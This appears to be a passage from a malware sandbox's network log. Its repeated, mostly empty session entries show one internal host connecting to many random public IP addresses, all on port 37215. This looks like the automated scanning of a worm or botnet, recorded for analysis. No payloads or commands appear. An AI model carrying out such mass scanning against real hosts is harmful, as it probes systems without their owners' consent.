                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13898192.168.2.1353884197.119.104.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13899192.168.2.136027257.250.224.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13900192.168.2.1358348197.112.221.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13901192.168.2.133883641.243.62.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13902192.168.2.1353002197.244.4.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13903192.168.2.136054241.154.75.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13904192.168.2.1351920197.90.193.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13905192.168.2.1352510197.240.116.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13906192.168.2.1347868197.76.194.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13907192.168.2.1339796139.179.60.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13908192.168.2.1354652197.105.136.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13909192.168.2.1358248197.137.162.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13910192.168.2.1338154157.77.130.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13911192.168.2.134243241.62.244.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13912192.168.2.1333036197.194.85.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13913192.168.2.135845864.105.196.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13914192.168.2.1355864183.127.12.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13915192.168.2.135774641.55.165.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13916192.168.2.1353728199.157.255.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13917192.168.2.1340972157.21.189.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13918192.168.2.135392641.59.234.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13919192.168.2.1347168156.210.204.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13920192.168.2.1357604197.144.62.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13921192.168.2.134313841.194.234.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13922192.168.2.1360610197.74.133.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13923192.168.2.1342920194.235.227.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13924192.168.2.1346834170.151.4.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13925192.168.2.1360656157.236.126.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13926192.168.2.1358504192.31.36.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13927192.168.2.135937041.132.41.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13928192.168.2.1353326121.81.139.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13929192.168.2.1357794157.152.11.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13930192.168.2.1343566157.126.133.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13931192.168.2.1338972157.216.112.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13932192.168.2.135760417.29.118.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13933192.168.2.1348036157.234.254.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13934192.168.2.1333876197.118.91.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13935192.168.2.1358472197.226.134.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13936192.168.2.134480641.65.98.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13937192.168.2.134518241.123.249.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13938192.168.2.1351864197.209.222.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13939192.168.2.1344334177.74.22.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13940192.168.2.1357276157.59.186.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13941192.168.2.133606680.100.89.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13942192.168.2.1336648197.96.112.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13943192.168.2.135140220.155.240.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13944192.168.2.1348786101.187.201.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13945192.168.2.1340932197.179.5.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13946192.168.2.1351812197.102.113.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13947192.168.2.133433859.198.110.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13948192.168.2.1358316221.40.108.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13949192.168.2.1339560157.56.68.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13950192.168.2.1345590197.43.205.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13951192.168.2.135714841.75.69.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13952192.168.2.1345824155.255.18.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13953192.168.2.1354882197.133.240.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13954192.168.2.134245441.151.249.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13955192.168.2.1342118197.91.87.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13956192.168.2.1357032179.72.1.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13957192.168.2.134994441.58.182.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13958192.168.2.135736641.46.50.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13959192.168.2.133849054.227.180.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13960192.168.2.135027441.76.94.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13961192.168.2.1344570197.3.23.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13962192.168.2.135321241.239.110.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13963192.168.2.133743841.70.171.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13964192.168.2.136056841.194.41.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13965192.168.2.1351562157.111.255.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13966192.168.2.135848841.108.92.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13967192.168.2.1356704157.89.55.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13968192.168.2.1347870197.159.106.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13969192.168.2.1357254197.80.200.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13970192.168.2.1338792197.4.203.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13971192.168.2.1338028152.72.196.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13972192.168.2.135500241.190.154.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13973192.168.2.1340640163.7.75.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13974192.168.2.1344904157.160.190.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13975192.168.2.134301041.224.121.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13976192.168.2.135370441.160.206.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13977192.168.2.1355786157.16.164.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13978192.168.2.133934841.168.100.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13979192.168.2.135094641.38.122.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13980192.168.2.1352086157.188.67.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13981192.168.2.133781014.162.240.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13982192.168.2.1357060203.0.197.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13983192.168.2.1348648197.69.43.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13984192.168.2.1360114200.65.238.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13985192.168.2.133322241.153.60.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13986192.168.2.1333872157.32.107.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13987192.168.2.135454880.172.118.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13988192.168.2.1346896145.18.29.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13989192.168.2.1355854119.152.123.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13990192.168.2.1340872133.220.6.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13991192.168.2.1337264157.19.214.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13992192.168.2.1341652197.186.77.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13993192.168.2.135837686.75.49.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13994192.168.2.1341412157.169.164.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13995192.168.2.134238241.59.96.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13996192.168.2.1341848197.193.18.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13997192.168.2.134620841.232.235.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13998192.168.2.1351252102.49.65.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13999192.168.2.1342458197.222.251.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14000192.168.2.1350248197.174.135.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14001192.168.2.135884041.95.135.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14002192.168.2.1337766197.3.209.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14003192.168.2.1332972197.35.6.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14004192.168.2.133949441.36.89.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14005192.168.2.1336666157.229.252.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14006192.168.2.1346150197.49.231.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14007192.168.2.1340974197.73.33.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14008192.168.2.1359134157.23.174.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14009192.168.2.134099235.36.158.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14010192.168.2.134798441.147.204.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14011192.168.2.1356334197.255.156.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14012192.168.2.1348122197.35.8.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14013192.168.2.136016441.209.12.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14014192.168.2.134032641.186.51.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14015192.168.2.135700236.197.97.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14016192.168.2.1343128197.166.222.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14017192.168.2.1346388157.13.169.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14018192.168.2.1336076197.249.114.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14019192.168.2.1350408197.15.73.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14020192.168.2.135355641.199.146.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14021192.168.2.1348262129.163.193.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14022192.168.2.133650641.127.245.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14023192.168.2.1359196148.211.132.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14024192.168.2.1354744157.66.114.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14025192.168.2.1339194170.92.73.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14026192.168.2.1348278197.216.201.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14027192.168.2.135571441.138.124.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14028192.168.2.1360636197.163.70.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14029192.168.2.1341712157.206.198.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14030192.168.2.1344310200.230.11.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14031192.168.2.1337698100.250.187.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14032192.168.2.1347348197.145.92.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14033192.168.2.133320041.140.171.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14034192.168.2.135520241.88.243.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14035192.168.2.1333872157.203.239.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14036192.168.2.1360060197.1.163.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14037192.168.2.1340038157.121.131.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14038192.168.2.134554041.247.148.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14039192.168.2.133493441.60.152.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14040192.168.2.1349364197.65.199.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14041192.168.2.1352452157.127.81.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14042192.168.2.1358996128.79.30.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14043192.168.2.1356898157.100.248.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14044192.168.2.1340298197.66.181.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14045192.168.2.133355837.238.122.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14046192.168.2.133681675.175.222.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14047192.168.2.1342362197.6.102.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14048192.168.2.1347336154.14.119.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14049192.168.2.1356804157.237.42.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14050192.168.2.134898041.39.51.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14051192.168.2.1354614157.224.117.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14052192.168.2.1339694157.69.1.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14053192.168.2.1343472157.110.130.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14054192.168.2.1359522160.33.230.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14055192.168.2.1350778200.101.111.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14056192.168.2.1348244202.58.65.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14057192.168.2.133805241.64.210.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14058192.168.2.1346578157.83.102.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14059192.168.2.1360300167.141.123.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14060192.168.2.134905641.191.10.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14061192.168.2.1358420197.208.30.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14062192.168.2.135412641.80.107.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14063192.168.2.134649241.107.42.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14064192.168.2.135707041.112.79.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14065192.168.2.1345514197.148.187.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14066192.168.2.1339620157.214.204.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14067192.168.2.135610041.244.91.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14068192.168.2.1341258157.134.71.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14069192.168.2.1357160197.6.198.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14070192.168.2.1353916157.80.244.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14071192.168.2.1350300157.252.60.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14072192.168.2.1351686157.61.165.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14073192.168.2.135203892.179.60.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14074192.168.2.133588494.102.204.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14075192.168.2.134245241.33.238.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14076192.168.2.1335958197.48.197.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14077192.168.2.1351526157.220.193.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14078192.168.2.1352362197.233.131.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14079192.168.2.135165250.118.231.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14080192.168.2.1359710186.16.102.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14081192.168.2.135806641.163.224.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14082192.168.2.1354296197.161.194.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14083192.168.2.1358506157.3.90.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14084192.168.2.134701834.6.87.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14085192.168.2.1347786157.150.170.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14086192.168.2.1344350197.241.233.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14087192.168.2.135758241.229.35.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14088192.168.2.135266441.50.214.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14089192.168.2.1351206197.213.158.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14090192.168.2.1351066197.168.228.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14091192.168.2.1353874157.106.200.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14092192.168.2.1342242123.66.105.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14093192.168.2.1357186197.8.200.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14094192.168.2.1353102157.235.244.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14095192.168.2.133730264.14.228.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14096192.168.2.1351582197.216.5.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14097192.168.2.134137841.86.58.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14098192.168.2.1345176157.141.181.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14099192.168.2.1347860157.150.155.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14100192.168.2.135458441.245.184.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14101192.168.2.133327284.225.37.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14102192.168.2.135895689.110.58.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14103192.168.2.1340640157.152.173.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14104192.168.2.1342160157.149.62.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14105192.168.2.1348992157.97.124.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14106192.168.2.133384041.15.5.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
